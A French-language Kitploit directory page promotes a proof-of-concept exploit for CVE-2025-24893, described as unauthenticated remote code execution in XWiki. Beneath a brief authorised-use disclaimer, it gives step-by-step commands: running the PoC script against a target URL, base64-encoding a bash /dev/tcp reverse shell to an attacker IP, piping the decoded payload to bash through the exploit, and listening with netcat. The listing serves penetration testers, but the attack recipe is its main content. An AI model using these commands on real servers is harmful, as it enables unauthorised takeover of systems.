Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24893-PoC — Exploit de preuve de concept pour CVE-2025-24893 permettant l'exécution de code à distance non authentifiée sur XWiki avec des commandes shell arbitraires et l'injection de shell inversé via Python. | Kitploit
Outils/GitHubGitHub/dhiaznaidi/cve-2025-24893-poc
ExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubdhiaznaidi/cve-2025-24893-poc

CVE-2025-24893-PoC

Exploit de preuve de concept pour CVE-2025-24893 permettant l'exécution de code à distance non authentifiée sur XWiki avec des commandes shell arbitraires et l'injection de shell inversé via Python.

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24893 - Exécution de code à distance (RCE) dans XWiki

Une preuve de concept (PoC) mise à jour pour CVE-2025-24893, une vulnérabilité critique RCE non authentifiée dans XWiki. Cette version améliore l'originale en permettant l'exécution arbitraire de commandes shell et une injection propre de reverse shell.

Par : HexHunter404


⚠️ Avertissement

Ce code est fourni à des fins éducatives et de tests de pénétration autorisés uniquement.
Ne l'utilisez pas sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas obtenu l'autorisation explicite de tester.


✨ Fonctionnalités

  • Prend en charge l'exécution de commandes via bash -c '<command>'
  • Prend en charge complètement les reverse shells (via base64 pour contourner les problèmes Groovy)
  • Gestion améliorée de la sortie des commandes
  • Préserve le chemin /xwiki et évite les boucles de redirection

🐍 Utilisation

root@kitploit:~
python3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"

🐚 Obtenir un reverse shell

. Encodez votre reverse shell en base64

root@kitploit:~
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64

. Envoyez-le à l'aide du PoC

root@kitploit:~
python3  CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"

. Configurez votre écouteur

root@kitploit:~
nc -lvnp 4444

En cas de succès, vous obtiendrez un shell

Télécharger l’outil